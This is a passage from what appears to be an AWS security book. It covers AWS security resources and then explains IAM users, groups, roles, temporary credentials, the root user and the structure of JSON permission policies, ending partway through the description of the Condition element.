AWS allows you to conduct penetration testing for your own EC2 and Relational Database
Service (RDS) instances; however, you have to first submit a request to AWS. Once AWS
approves this request, you can conduct penetration testing and vulnerability scans for EC2
and RDS instances in your AWS account. We'll take a detailed look at penetration testing in
subsequent chapters.
AWS Security resources
AWS provides several resources to help you secure your workload on AWS. Let us look at
these resources.
Overview of Security in AWS
[ 34 ]
AWS documentation
This is one of the best resources available for developers, system administrators, and IT
executives alike. It is free, comprehensive, and covers all AWS services including software
development kits for various languages and all AWS toolkits. You can find the AWS
documentation at https://aws.amazon.com/documentation.
AWS whitepapers
These technical white papers are constantly updated with new services, and features added
for all services. It is free and covers a wide variety of topics for securing your network, data,
security by design, architecture, and so on. These white papers are written by professionals
inside and outside of AWS and they are available at https://aws.amazon.com/
whitepapers.
AWS case studies
AWS has case studies specific to industry, domain, technology, and solutions. They have
more than a million active customers across the globe and there are scores of case studies to
help you with your use case, irrespective of your industry, or size of your organization.
These case studies are available at https://aws.amazon.com/solutions/case-studies.
AWS YouTube channel
AWS has numerous events such as AWS Summit, AWS Re:Invent, and so on throughout
the year around the globe. There are sessions on security at these events where customer
AWS and AWS partners share tips, success stories, ways to secure the network, data, and so
on. These videos are uploaded to the AWS channel on YouTube. This is a treasure trove for
learning about AWS services from the best in the business. There are multiple channels for
various topics and multiple languages. You can subscribe to the AWS YouTube channels
at https://www.youtube.com/channel/UCd6MoB9NC6uYN2grvUNT-Zg.
Overview of Security in AWS
[ 35 ]
AWS blogs
AWS has blogs dedicated to various topics such as AWS Security, AWS big data, AWS
DevOps, and so on. There are blogs for countries as well such as, AWS blog (China), AWS
blog (Brazil), and so on. There are blogs for technologies such as AWS .NET, AWS PHP, and
so on. You can subscribe to these blogs at https://aws.amazon.com/blogs/aws.
AWS Partner Network
When you require external help to complete your project on AWS, you can reach out to
professionals on the AWS Partner Network. These are organizations authorized by AWS as
consulting or technology partners. They can provide professional services to you for your
AWS requirements such as security, compliance, and so on. You can find more information
about them at https://aws.amazon.com/partners.
AWS Marketplace
AWS marketplace is an online store where 3500+ products are available that integrate
seamlessly with your AWS resources and AWS services. Most of these offer a free trial
version of their products and these products are available for security as well as other
requirements. We'll have a detailed look at the AWS marketplace in the subsequent
chapters. You can visit AWS Marketplace at https://aws.amazon.com/marketplace.
Summary
Let us recap what we have learnt in this chapter:
We learnt about the shared security responsibility models of AWS. We found that AWS
does the heavy lifting for customers by taking complete ownership of the security of its
global infrastructure of regions and availability zones consisting of data centers, and lets
customers focus on their business. We got to know that AWS offers multiple services under
broad categories and we need to have different security models for various services that
AWS offers, such as AWS infrastructure services, AWS container services, and AWS
abstract services.
Overview of Security in AWS
[ 36 ]
AWS has a different set of security responsibilities for AWS and the customer for the above
three categories. We also learnt about physical security of AWS, global infrastructure,
network security, platform security, and people and procedures followed at AWS. We
looked at ways to protect our AWS account. We went through a couple of AWS services
such as AWS Trusted Advisor's and AWS Config and saw how they can help us secure our
resources in cloud. We briefly looked at security logs and AWS CloudTrail for finding the
root causes for security related incidents. We'll look at logging features in detail in the
subsequent chapters later in this book.
In subsequent chapters, we'll go through services that AWS offers to secure your data,
applications, network, access, and so on. For all these services, we will provide scenarios
and solutions for all the services. As mentioned earlier, the aim of this book is to help you
automate security in AWS and help you build security by design for all your AWS
resources. We will also look at logging for auditing and identifying security issues within
your AWS account. We will go through best practices for each service and we will learn
about automating as many solutions as possible.
In the next chapter, AWS Identity and Access Management, we will deep dive into AWS IAM
that lets you control your AWS resources securely from a centralized location. IAM serves
as an entry point to AWS Security where AWS transfers the security baton to customers for
allowing tiered access and authenticating that access for all your AWS resources. We are
going to see how we can provide access to multiple users for resources in our AWS account.
We will take a look at the various credentials available in detail. We will deep dive into
AWS identities such as users, groups and roles along with access controls such as
permissions and policies.
2
AWS Identity and Access
Management
AWS Identity and Access Management (IAM) is a web service that helps you securely
control access to AWS resources for your users. You use IAM to control who can use your
AWS resources (authentication) and what resources they can use and in what ways
(authorization).
In other words, or rather a simpler definition of IAM is as follows:
AWS IAM allows you to control who can take what actions on which resources in AWS.
IAM manages users (identities) and permissions (access control) for all AWS resources. It is
offered free of charge, so you don't have to pay to use IAM. It provides you greater control,
security, and elasticity while working with AWS cloud.
IAM gives you the ability to grant, segregate, monitor, and manage access for multiple
users inside your organization or outside of your organization who need to interact with
AWS resources such as Simple Storage Service (S3) or Relational Database Service (RDS)
in your AWS account. IAM integrates with AWS CloudTrail, so you can find information in
logs about requests made to your resources in your AWS account; this information is based
on IAM identities.
IAM is a centralized location for controlling and monitoring access control for all the
resources in your AWS account.
AWS Identity and Access Management
[ 38 ]
Chapter overview
In this chapter, we are going to learn about AWS IAM. We will go through various IAM
tools and features and their use cases and look at ways in which we can access IAM. We
will deep dive into IAM authentication and authorization. Authentication includes
identities such as users, roles, and groups, and authorization talks about access
management, permissions, and policies for AWS resources. We'll walk through the benefits
of IAM and how it can help us secure our AWS resources. Finally, we'll take a look at IAM
best practices.
The following is a snapshot of what we'll cover in this chapter:
IAM features and tools
IAM authentication
IAM authorization
AWS credentials
IAM limitations
IAM best practices
This chapter will help us understand user authentication and access control in detail.
Essentially, IAM is our first step towards securing our AWS resources. All of us who have
used a laptop or a mobile phone understand that access control plays a vital part in securing
our resources. So, if a person gets hold of your credentials, it will be disastrous from the
point of view of data security. Ensuring your credentials are secure, having trusted entities
interacting with your AWS resources, and having stringent controls as well as greater
flexibility allows you to support multiple use cases with a wide variety of AWS resources.
Along with learning about all available IAM features, we will also learn how to create,
monitor, and manage various identities, their credentials, and policies. Additionally, we'll
look at Multi-Factor Authentication (MFA), Secure Token Service (STS), and tools such as
IAM policy simulator.
Following on, we'll deep dive into identities and policies. We'll learn what tools and
features are available in AWS IAM to support a myriad of use cases for allowing access and
performing actions on AWS resources. We will go through the various credentials that AWS
provides and how to manage them.
AWS Identity and Access Management
[ 39 ]
We'll go through IAM limitations for various entities and objects. Lastly, we'll take a look at
IAM best practices that are recommended to ensure that all your resources can be accessed
in a secure manner.
IAM features and tools
IAM is free of cost. It is Payment Card Industry Data Security Standard (PCI-
DSS) compliant, so you can run your credit card application and store credit card
information using IAM. It is also eventually consistent, meaning any change you make in
IAM would be propagated across multiple AWS data centers: this propagation could take a
few milliseconds. So design your application and architecture keeping this feature in mind.
IAM integrates with various AWS services so you can define fine grain access control for
these services.
Let us look at other features of IAM that make it such a widely used, powerful, and
versatile AWS service. As a matter of fact, if you have an AWS account and you want to use
resources in your AWS account, you have to pass through IAM in one way or other, there's
no two ways about it!
Security
IAM is secure by default. When you create a new user in IAM, by default this user has no
permission assigned for any AWS resource. You have to explicitly grant permissions to
users for AWS resources and assign them unique credentials. You don't have a need for
sharing credentials as you can create separate identities (user accounts) and multiple types
of credentials for all use cases.
AWS account shared access
If you are an organization or an enterprise, you would have one or more AWS accounts,
and you will have a requirement to allow other people access your AWS account(s). IAM
allows you to do that with the help of user accounts without you sharing your credentials
with other people. If you are an individual and you want other people to access your AWS
account, you can do that as well by creating separate user accounts for them in your AWS
account.
AWS Identity and Access Management
[ 40 ]
Granular permissions
Let's take a common scenario: you want to allow developers in your organization to have
complete access to the Elastic Compute Cloud (EC2) service and the finance or accounting
team should have access to billing information and people in the human resources
department should have access to a few S3 buckets. You can configure these permissions in
IAM, however, let's say you want to have your developers access the EC2 service only from
Monday to Friday and between office hours (let's say 8 a.m. to 6 p.m.), you can very well
configure that as well.
IAM allows you to have really fine grain permissions for your users and for your resources.
You could even allow users to access certain rows and columns in your DynamoDB table!
Identity Federation
At times, you'll have a requirement to allow access to users or resources, such as
applications outside of your organization, to interact with your AWS services. To facilitate
such requirements, IAM provides a feature called Identity Federation. It allows you to
provide temporary access to those having their credentials stored outside of your AWS
account such as Microsoft Active Directory, Google, and so on. We'll have a detailed look at
identity federation later in this chapter.
Temporary credentials
There are scenarios where you would want an entity to access resources in your AWS
account temporarily and you do not want to create and manage credentials for them. For
such scenarios, IAM offers the roles feature. Roles could be assumed by identities. IAM
manages credentials for roles and rotates these credentials several times in a day. We will
look at roles in detail in our IAM authentication section in this chapter.
You could access IAM in the following four ways:
AWS Management Console
AWS command line tools
AWS software development kits
IAM HTTPS API
Let us look at these options in detail:
AWS Identity and Access Management
[ 41 ]
AWS Management Console
The AWS Management Console is a web based interface for accessing and managing AWS
resources and services including IAM. Users are required to sign in using the sign-in link
for AWS account along with their username and password. When you create a user, you
choose if they can access AWS resources using either the AWS console or by using the AWS
command line interface, that is, programmatically or by both methods.
AWS Management Console is available on various devices such as tables and mobile
phones. You can also download a mobile app for AWS console from Amazon Apps, iTunes,
or Google Play.
As an AWS account owner, you get the URL for the sign-in when you log in to your AWS
account. This URL is unique for each account and is used only for web based sign-in. You
can customize this URL as well through your AWS account to make it more user friendly.
You can also use your root account credentials for signing-in through the web based
interface. Simply navigate to the account sign-in page and click on the Sign-in using root
credentials link as shown in the following figure. However, as discussed in Chapter 1,
Overview of Security in AWS, AWS does not recommend using your root account for
carrying out day to day tasks, instead AWS recommends creating separate user accounts
with the required privileges:
Figure 1 - AWS console login
AWS Identity and Access Management
[ 42 ]
AWS command line tools
AWS command line interface (CLI) and AWS tools for Windows PowerShell are two tools
provided by AWS to access AWS services. These tools are specifically useful for automating
your tasks through scripts on your system's command line and are often considered more
convenient and faster than using AWS Management Console. AWS CLI is available for
Windows, Mac, and Linux. You can find more information about AWS CLI including the
downloadable version at https://aws.amazon.com/cli.
AWS SDKs
AWS Software Development Kits (SDKs) are available for popular programming
languages such as .NET, JAVA, and so on. AWS SDKs are also available for platforms such
as iOS and Android for developing web and mobile applications. These SDKs enables
application developers to create applications that can interact with various AWS services by
providing libraries, sample code etc. For more information about these SDKs, please visit
https://aws.amazon.com/tools.
IAM HTTPS API
Another way to programmatically access AWS Services including IAM is to use IAM
HTTPS (secure HTTP) Application Programming Interface (API). All the API requests
originating from AWS developer tools such as AWS CLI and AWS SDKs are digitally
signed by AWS, providing additional layer of security for data in transit.
IAM Authentication
IAM authentication in AWS includes the following identities:
Users
Groups
Roles
Temporary security credentials
Account root user
AWS Identity and Access Management
[ 43 ]
Identities are used to provide authentication for people, applications, resources, services,
and processes in your AWS account. Identities represent the user that interacts with the
AWS resources based on authentication and authorization to perform various actions and
tasks. We will look at each one of the identities in detail.
IAM user
You create an IAM user in AWS as an entity to allow people to sign into the AWS
Management Console or to make requests to AWS services from your programs using CLI
or API. An IAM user can be a person, an application, or an AWS service that interacts with
other AWS services in one way or another. When you create a user in IAM, you provide it
with a name and a password that is required to sign into the AWS Management Console.
Additionally, you can also provision up to two access keys for an IAM user consisting of the
access key ID and a secret access key, that are needed to make requests to AWS from CLI or
API.
As we know, by default IAM users have no permissions, so you need to give this brand new
user permissions either by assigning them directly or by adding them to a group that has all
the necessary permissions, the latter being recommended by AWS and a much preferred
way to manage your users and their permissions. Alternatively, you can also clone
permissions of an existing IAM user to copy policies and add users to the same groups as
the existing IAM users. With every IAM user, there are the following three types of
identification options available:
Every IAM user has a friendly name such as Albert or Jack that's helpful in
identifying or associating with people for whom we have created this user
account. This name is given when you create an IAM user and it is visible in the
AWS Management Console.
Every IAM user has an Amazon Resource Name (ARN) as well; this name is
unique for every resource across AWS. An ARN for an IAM user in my AWS
account looks like arn:aws:iam::902891488394:user/Albert.
Every IAM user has a unique identifier for the user that's not visible in the AWS
Management Console. You can get this ID only when you create a user in the
IAM programmatically through API or AWS command line tools such as AWS
CLI.
AWS Identity and Access Management
[ 44 ]
Whenever we create a new IAM user, either through AWS console or programmatically,
there aren't any credentials assigned to this user. You have to create credentials for this user
based on access requirements. As we have seen earlier, a brand new IAM user does not
have any permission to perform any actions in AWS account for any AWS resources.
Whenever you create an IAM user, you can assign permissions directly to each individual
users. AWS recommends that you follow the least privilege principles while assigning
permissions, so if a user named Jack needs to access S3 buckets, that's the only permission
that should be assigned to this user.
The following figure shows IAM users for my AWS account:
Figure 2 - AWS IAM users
Let us look at the steps to create a new IAM user by using the AWS console. You can also
create an IAM user through AWS CLI, IAM HTTP API, or tools for Windows PowerShell:
Navigate to the IAM dashboard.
1.
Click on the Users link. It will show you the existing users (if any) for your AWS
2.
account as shown in the preceding figure – AWS IAM users.
IAM is a global service so you will see all users in your AWS account.
3.
Click on the Add user button.
4.
5. Add a friendly name for the user in the username textbox.
AWS Identity and Access Management
[ 45 ]
If this user is going to access AWS through the console then give this user the
6.
AWS Management Console Access, if the user will access AWS resources only
programmatically then give only programmatic access by selecting the
appropriate checkbox. You can select both options as well for a user.
Click on the Permissions button to navigate to the next page.
7.
On the Permissions page, you have three options for assigning permissions to
8.
this user. You can assign permissions at this stage or you can assign them after
you have created this user:
You can add this user to a group so the user gets all the permissions
attached to a group.
You can copy permissions from an existing user so this new user will
have the same permissions as an existing use
You can attach permissions directly to this user
Click on the Next: Review button.
9.
On this page, review all information for this user that you have entered so far and
10.
if all looks good, click on the Create User button to create a new IAM user. If you
want to edit any information, click on the Previous button to go back and edit it.
On the next page, you are presented with the success message along with
11.
credentials for this user. AWS also provides you with a .csv file that contains all
credentials for this user. These credentials are available for download only once.
If these credentials are lost, they cannot be recovered, however, new credentials
can be created anytime.
When you navigate to the Users page through the IAM dashboard, on the top right-hand
corner, you see global written inside a green rectangle. This indicates that users are global
entities, that is when you create a user you do not have to specify a region. AWS services in
all regions are accessible to an IAM user. Moreover, each IAM user is attached to one AWS
account only, it cannot be associated with more than one AWS account. Another thing to
note is that you do not need to have separate payment information for your users stored in
AWS, all the charges incurred by activities of users in your AWS account is billed to your
account.
AWS Identity and Access Management
[ 46 ]
As noted earlier, an IAM user can be a person, an AWS service, or an application. It is an
identity that has permissions to do what it needs to do and credentials to access AWS
services as required. You can also create an IAM user to represent an application that needs
credentials in order to make requests to AWS. This type of user account is known as a
service account. You could have applications with their own service accounts in your AWS
account with their own permissions.
IAM groups
A collection of IAM users is known as an IAM group. Groups allow you to manage
permissions for more than one users by placing them according to their job functions,
departments, or by their access requirements. So, in a typical IT organization, you'll have
groups for developers, administrators, and project managers. You will add all users
belonging to their job functions in groups and assign permissions directly to the group; all
users belonging to that group will get that permission automatically. If a developer moves
to another job function within an organization, you'll simply change his/her group to get
new permissions and revoke the old ones. Thus making it easier to manage permissions for
multiple users in your organization.
Let us look at features of IAM groups:
A group can have multiple users and a user can be member of more than one
group.
Nesting of group is not allowed, you can't have a group within a group.
A group can contain many users, and a user can belong to multiple groups.
Groups can't be nested; they can contain only users, not other groups.
Groups are not allowed to have security credentials and they can't access AWS
services. They simply provide a way to manage IAM users and permissions
required for IAM users.
Groups can be renamed, edited, created, and deleted from AWS console as well
as from CLI.
Let us look at the following diagram as an example for IAM groups, there are three groups
Admins, Developers, and Test. The Admins group contains two people, Bob and Susan,
whereas Developers group contains application such as DevApp1 along with people. Each
of these users in these groups have their own security credentials:
AWS Identity and Access Management
[ 47 ]
Figure 3 - AWS IAM groups
Normally, the following would be the sequence of events for creating these groups and
users:
AWS account will be created by the organization.
1.
Root user will login and create the Admins group and two users Bob and Susan.
2.
Root user will assign administrator permission to Admins group and add Bob
3.
and Susan to the Admins group.
Users in the Admins group will follow the same process for creating other
4.
groups, users, assigning permissions to groups, and adding users to groups.
Note that the root user is used only for creating the admins users and
groups. Alternatively, root user can simply create an IAM user Susan with
administrator permission and all of the work after that can be done by
user Susan. After that, all other groups and users are created by using
users who have administrator permissions.
Let us look at the following steps to create groups using AWS console. You can create
groups from AWS CLI, AWS API, and tools for Windows PowerShell as well:
Navigate to IAM by using the AWS console.
1.
Click on Groups in the navigation pane.
2.
Click on the Create New Group button. On this page, you can see all groups
3.
present in your AWS account.
AWS Identity and Access Management
[ 48 ]
Give the name for your group and click on the Next Step button.
4.
On the next page, you can attach a policy to your group or you could do it after
5.
you have created a group.
Review all the information for this group and click on the Create Group button.
6.
Once your group is created, you can add/remove users from this group. You can
7.
also edit or delete the group from the console.
IAM roles
An IAM role is an AWS identity, recommended by AWS over the IAM user for the many
benefits it provides when compared to an IAM user. A role is not necessarily associated
with one person, application, or a service, instead, it is assumable by any resource that
needs it. Moreover, credentials for roles are managed by AWS; these credentials are created
dynamically and rotated multiple times in a day. Roles are a very versatile feature of IAM,
it can be used for a variety of use cases such as delegating access to services, applications or
users that might not need access to your AWS resources regularly or they are outside of
your organization and need to access your AWS resources. You can also provide access to
resources whose credentials are stored outside of your AWS account such as your corporate
directory. You can have the following scenarios making use of roles:
An IAM user having different AWS account as the role.
An IAM user having similar AWS account as IAM role.
AWS web service provided by AWS such as S3.
Any user outside of your organization that is authenticated by any external
identity provider service compatible with Security Assertion Markup Language
(SAML) 2.0 or OpenID Connect or Compatible with any custom built identity
broker.
Let us look at the steps to create a role using the AWS console. You can create roles by using
the AWS CLI, AWS API, or tools for Windows PowerShell:
Navigate to the IAM dashboard from the AWS console.
1.
Click on Roles in the navigation pane.
2.
Click on the Create New Role button. On this screen, you can view, edit, and
3.
delete all roles available in your AWS account.
Select one of the 4 types of IAM roles available as mentioned in the next section.
4.
5. Attach policies to this role and click on the Next Step button.
AWS Identity and Access Management
[ 49 ]
On the next screen, give a user friendly name to this role and optionally add a
6.
description.
You can also change policies on this screen.
7.
Click on the Create Role button. It will create this new role.
8.
There are the following four types of IAM roles available in AWS for various use cases:
AWS service role
There are scenarios where an AWS service such as Amazon EC2 needs to perform actions
on your behalf, for example, an EC2 instance would need to access S3 buckets for uploading
some files, so we'll create an AWS Service Role for EC2 service and assign this role to the
EC2 instance. While creating this service role, we'll define all the permissions required by
the AWS service to access other AWS resources and perform all actions.
The following figure shows various AWS service roles available in IAM:
Figure 4 - AWS Service Role types
AWS Identity and Access Management
[ 50 ]
AWS SAML role
SAML 2.0 (Security Assertion Markup Language 2.0) is an authentication protocol that is
most commonly used between an identity provider and service provider. AWS allows you
to create roles for SAML 2.0 providers for identity federation. So, if your organization is
already using identity provider software that is compatible with SAML 2.0, you can use it to
create trust between your organization and AWS as service provider. This will help you
create a single sign on solution for all users in your organization.
You can also create your own custom identity provider solution that is compatible with
SAML 2.0 and associate it with AWS.
The following figure shows the AWS SAML 2.0 role available in IAM dashboard:
Figure 5 - AWS SAML Role
AWS Identity and Access Management
[ 51 ]
Role for cross-account access
This role supports two scenarios, the first enabling access between your multiple AWS
accounts and the second enabling access to your AWS account by resources in other AWS
accounts that are not owned by you. Roles are the primary way to support scenarios for
cross-account access and enabling delegation. You can use this role to delegate permissions
to another IAM user.
The following figure shows the various options available for cross-account access:
Figure 6 - AWS cross-account access roles
AWS Identity and Access Management
[ 52 ]
Role for Web Identity Provider
There are times when you will have a requirement to provide access to resources in your
AWS account for users who are not authorized to use AWS credentials; instead they use
either web identity providers such as Facebook, Amazon, and so on, for sign in or any
identity provider compatible with OpenID Connect (OIDC). When users are authenticated
by these external web identity providers, they will be assigned an IAM role. These users
will receive temporary credentials required to access AWS resources in your AWS account.
The following figure the shows various options available for creating roles for Identity
provider access:
Figure 7 - AWS identity provider access roles
Let us also look at the other terms used with reference to IAM roles.
AWS Identity and Access Management
[ 53 ]
Identity Provider and Federation
As we have seen earlier, we can manage user identities for our IAM users either in AWS or
outside of AWS by using IAM identity providers. You can give access to your AWS
resources to the user whose identities are managed by AWS or outside of AWS. This
functionality supports scenarios where your users are already managed by your
organization's identity management system, such as Microsoft Active Directory. It also
supports use cases where an application or a mobile app needs to access your AWS
resources.
Identity providers help keep your AWS account secure because your credentials are not
embedded in your application. To use an identity provider, you will need to create an IAM
identity provider entity to establish a trust relationship between your AWS account and the
identity provider. AWS supports two types of identity providers:
OpenID Connect Compatible
SAML 2.0 Compatible
You can create an identity provider from the IAM dashboard. This creates trust between
your AWS account and identity provider. For more information on how to create identity
providers, please visit the following URL:
http://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers_create.html
Alternatively, if you have users of a mobile application that need access to your AWS
resources, you can use the web identity federation. These users can sign in using the already
established and popular identity providers such as Facebook, Amazon, Google, and so on
and receive an authorization token. This token can be exchanged for temporary security
credentials. These credentials will be mapped to an IAM role that will have permissions to
access AWS resources.
AWS, however, recommends that for most scenarios, Amazon Cognito should be used
instead of web identity federation as it acts as an identity broker and does much of the
federation work for you. We will look at Amazon Cognito in the subsequent chapters.
AWS Identity and Access Management
[ 54 ]
Delegation
Delegation means granting permission to users in another AWS account to allow access to
resources that you own in your AWS account. It involves setting up a trust relationship
between two AWS accounts. The trusting account owns the resource and the trusted
account contains users needing access for resources. The trusted and trusting accounts can
be any of the following:
The same account
Two accounts that are both under your (organization's) control
Two accounts owned by separate organizations
For delegation, you start by creating an IAM role with two policies, a permissions policy
and a trust policy. The permissions policy takes care of permissions required to perform
actions on an AWS resource and the trust policy contains information about trusted
accounts that are allowed to grant its users permissions to assume the role.
A trust policy for roles can't have a wildcard (*) as a principal. The trust policy on the role in
the trusting account is one-half of the permissions. The other half is a permissions policy
attached to the user in the trusted account that allows that user to switch to, or assume the
role. A user who assumes a role temporarily gives up his or her own permissions and
instead takes on the permissions of the role. The original user permissions are restored
when the user stops using the role or exits. An additional parameter external ID helps
ensure secure use of roles between accounts that are not controlled by the same
organization.
Temporary security credentials
When you have a requirement to create temporary security credentials instead of persistent,
long term security credentials, you will use the AWS Security Token Service (STS) to
create temporary security credentials for users to access your AWS resources. AWS
recommends using these credentials over persistent ones as these are more secure and are
managed by AWS. Temporary credentials are useful in scenarios that involve identity
federation, delegation, cross-account access, and IAM roles. These credentials are almost
similar to access key credentials that are created for IAM users except for few a differences
as mentioned in the following:
AWS Identity and Access Management
[ 55 ]
As the name implies, temporary security credentials are short lived. You can
configure them to be valid from a minimum of 15 minutes to a maximum of 36
hour in case of configuring custom identity broker; the default value is 1 hour.
Once these credentials expire, AWS no longer recognizes them and all requests
for access are declined.
Unlike access keys that are stored locally with the user, temporary security
credentials are not stored with the user. Since they are managed by AWS, they
are generated dynamically and provided to the user when requested, following
the principle of last minute credential. The user can request these credentials
when they expire or before they expire as long as this user has permissions to
request them.
These differences give the following advantages for using temporary credentials:
You do not have to distribute or embed long-term AWS Security credentials with
an application. So, you do not risk losing security credentials if your application
is compromised.
You can provide access to your AWS resources to users without creating an AWS
identity for them. It helps keep your user management lean. Temporary
credentials are the basis for roles and identity federation.
The temporary security credentials have a limited lifetime and they are not
reusable once they expire. You don't have to worry about defining a credentials
policy or ensure if they are rotated periodically, as these tasks are taken care of by
AWS internally. You also don't have to plan on revoking them as they are short
lived.
AWS Security Token Service
The AWS STS is a web service that enables you to request temporary, limited privilege
credentials for IAM users or for users that you authenticate (federated users) to use.
Essentially, temporary security credentials are generated by AWS STS.
By default, AWS STS is a global service with a single endpoint at https://sts.amazonaws.
com, this endpoint points to the US-East-1 (Northern Virginia) region. You can use STS in
other regions as well that support this service. This will help you to reduce latency by
sending requests to regions closer to you/your customers. Credentials generated by any
region are valid globally. If you don't want any region to generate credentials, you can
disable it.
AWS Identity and Access Management
[ 56 ]
AWS STS supports AWS CloudTrail, so you can record and analyze information about all
calls made to AWS STS, including who made requests, how many were successful, and so
on.
When you activate a region for an account, you enable the STS endpoints in that region to
issue temporary credentials for users and roles in that account when a request is made to an
endpoint in the region. The credentials are still recognized and are usable globally. It is not
the account of the caller, but the account from which the temporary credentials are
requested that must activate the region.
AWS STS is offered to all AWS users at no additional charge. You are charged only for
services accessed by users having temporary security credentials that are obtained through
AWS STS.
The account root user
The account root user is a user that is created when you first create an AWS account using
an email id and password. This user has complete access to all AWS services and all
resources for this AWS account. This single sign-in identity is known as the root user.
AWS strongly recommends that you do not use the root user for your everyday tasks, even
the administrative ones. Instead, use the root account to create your first IAM user and use
this first IAM user for all the tasks such as creating additional users or accessing AWS
services and resources. AWS recommends that you should delete your root access keys and
activate MFA for root user. Root user should be used for performing handful of tasks that
specifically require you to use root user. Following are some of such tasks:
Changing your root account information, such as changing the root user
password
Updating your payment information
Updating your support plan
Closing your AWS account
You can find detailed lists of all tasks at http://docs.aws.amazon.com/general/latest/
gr/aws_tasks-that-require-root.html.
AWS Identity and Access Management
[ 57 ]
The following figure shows the IAM dashboard along with recommendations for the
account root user:
Figure 8 - AWS account root user recommendations
IAM Authorization
When you create an AWS account, it has a user known as root user. This user has, by
default, access to all AWS service and resources. No other user (or any IAM entity) has any
access by default and we have to explicitly grant access for all users. In this section, we'll
talk about authorization in IAM or access management, it is made up of the following two
components:
Permissions
Policy
Permissions
Permissions let you take actions on AWS resources. It allows your users (AWS identities) to
perform tasks in AWS. When you create a new user (except for the root user), it has no
permission to take any action in AWS. You grant permissions to the user by attaching a
policy to that user. So, for example, you can give permission to a user to access certain S3
buckets or to launch an EC2 instance.
AWS Identity and Access Management
[ 58 ]
Permissions can be assigned to all AWS identities such as users, groups, and roles. When
you give permission to a group, all members of that group get that permission and if you
remove a permission from a group, it is revoked from all members of that group.
You can assign permissions in couple of ways:
Identity-based: These permissions are assigned to AWS identities such as users,
groups, and roles. They can either be managed or inline (we'll talk about
managed and inline in our Policies section).
Resource-based: These permissions are assigned to AWS resources such as
Amazon S3, Amazon EC2. Resource-based permissions are used to define who
has access to an AWS resource and what actions they can perform on it.
Resource-based policies are inline only, not managed.
Let us look at examples for each of them:
Identity-based: These permissions are given to identities such as IAM users or
groups. For example, there are two IAM users, Albert and Mary. Both have
permissions to read S3 buckets and provision EC2 instances.
Resource-based: These permissions are given to AWS resources, such as S3
buckets or EC2 instances. For example, an S3 buckets has allowed access for
Albert and Mary; an EC2 service is allowing access for Albert and Mary to
provision EC2 instances.
Note that resource-based and resource level permissions are different.
Resource-based permissions can be attached directly to a resource whereas
resource level goes a level deeper by giving you the ability to manage
what actions can be performed by users as well as which resources those
actions can be performed upon.
Some AWS services lets you specify permissions for actions such as list, read, write and so
on, but they don't let you specify the individual resources such as EC2, S3, RDS and so
on. There are a handful of AWS services that support resource-based permissions such as
EC2, Virtual Private Cloud (VPC) and so on.
The following are six IAM permission types that are evaluated for integration with each
AWS service:
Action-level permissions: The service supports specifying individual actions in a
policy's action element. If the service does not support action-level permissions,
policies for the service use wildcard (*) in the Action element.
AWS Identity and Access Management
[ 59 ]
Resource-level permissions: The service has one or more APIs that support
specifying individual resources (using ARNs) in the policy's resource element. If
an API does not support resource-level permissions, then that statement in the
policy must use * in the Resource element.
Resource-based permissions: The service enables you to attach policies to the
service's resources in addition to IAM users, groups, and roles. The policies
specify who can access that resource by including a Principal element.
Tag-based permissions: The service supports testing resource tags in a condition
element.
Temporary security credentials: The service lets users make requests using
temporary security credentials that are obtained by calling AWS STS APIs like
AssumeRole or GetFederationToken.
Service linked roles: The service requires that you use a unique type of service
role that is linked directly to the service. This role is pre-configured and has all
the permissions required by the service to carry out the task.
A detailed list of all services that IAM integrates with is available at the following URL:
http://docs.aws.amazon.com/IAM/latest/UserGuide/reference_aws-services-that-
work-with-iam.html
Many AWS services need to access other AWS services, for example, EC2 might need to
access a bucket on S3 or EC2 might need to access an instance on RDS. They need to
configure permissions to perform such access, this configuration is provided in detail in the
documentation of AWS services.
Policy
A policy is a document listing permissions in the form of statements. It is a document in
JavaScript Object Notation (JSON) format. It is written according to the rules of the IAM
policy language which is covered in the next section. A policy can have one or more
statements, with each statement describing one set of permissions. These policies can be
attached to any IAM identities such as users, roles, or groups. You can attach more than one
policy to an entity. Each policy has its own Amazon Resource Name (ARN) that includes
the policy name and is an entity in IAM.
AWS Identity and Access Management
[ 60 ]
Fundamentally, a policy contains information about the following three components:
Actions: You can define what actions you will allow for an AWS service. Each
AWS service has its own set of actions. So, for example, you allow the describe-
instances action for your EC2 instances, that describes one or more instances
based on the instance-id passed as a parameter. If you do not explicitly define
an action it is denied by default.
Resources: You need to define what resources actions can be performed on. For
example, do you want to allow the describe-instances action on one specific
instance or range of instances or all instances. You need to explicitly mention
resources in a policy, by default, no resources are defined in a policy.
Effect: You define what the effect will be when a user is going to request access,
and there are two values that you can define: allow or deny. By default, access to
resources are denied for users, so you would normally specify allow for this
component.
The following is a sample policy used to allow all describe actions for all EC2 instances:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "ec2:Describe*",
"Resource": "*"
}
]
}
Let us look at the following important elements of a policy.
Statement
The Statement element is the most important and required element for a policy. It can
include multiple elements and it can also have nesting of elements. The Statement element
contains an array of individual statements. Each individual statement is a JSON block
enclosed in braces { }.
AWS Identity and Access Management
[ 61 ]
Effect
This element is required as well. It specifies if an action is allowed or denied; it has only two
valid values, allow, and deny. As mentioned earlier, by default, the value is deny, you have
to explicitly allow it.
Principal
A Principal element is used to define the user. A user can be an IAM user, federated user,
role using user, any AWS account, any AWS service, or any other AWS entity that is
allowed or denied access to a resource and that can perform actions in your AWS account.
You use the Principal element in the trust policies for IAM roles and in resource-based
policies.
A Principal element should not be used while creating policies that are attached to IAM
users or groups and when you are creating an access policy for an IAM role. This is because
in these policies a principal is a user or role that is going to use the policy. Similarly, for a
group, a principal is an IAM user making the request from that group. A group cannot be
identified as a principal because a group is not truly an identity in IAM. It provides a way
to attach policies to multiple users at one time.
A principal is specified by using the ARN of the user (IAM user, AWS account, and so on).
You can specify more than one user as the Principal as shown in the following code:
"Principal": {
"AWS": [
"arn:aws:iam::AWS-account-ID:user/user-name-1",
"arn:aws:iam::AWS-account-ID:user/UserName2"
]
}
Action
The Action element defines an action or multiple actions that will either be allowed or
denied. The statements must include either an Action or NotAction element. This should
be one of the actions each AWS service has; these actions describe tasks that can be
performed with that service. For example: Action": "ec2:Describe*, is an action.
AWS Identity and Access Management
[ 62 ]
You can find a list of actions for all AWS services in the API reference documentation
available at the following URL:
https://aws.amazon.com/documentation/
Resource
The Resource element describes an AWS resource that the statement cover. All statements
must include either a Resource or NotResoruce element. Every AWS service comes with
its own set of resources and you define this element using ARN.
Condition
The Condition element also known as condition block lets you provide conditions for a
policy. You can create expressions with Boolean condition operators (equal, not equal, and
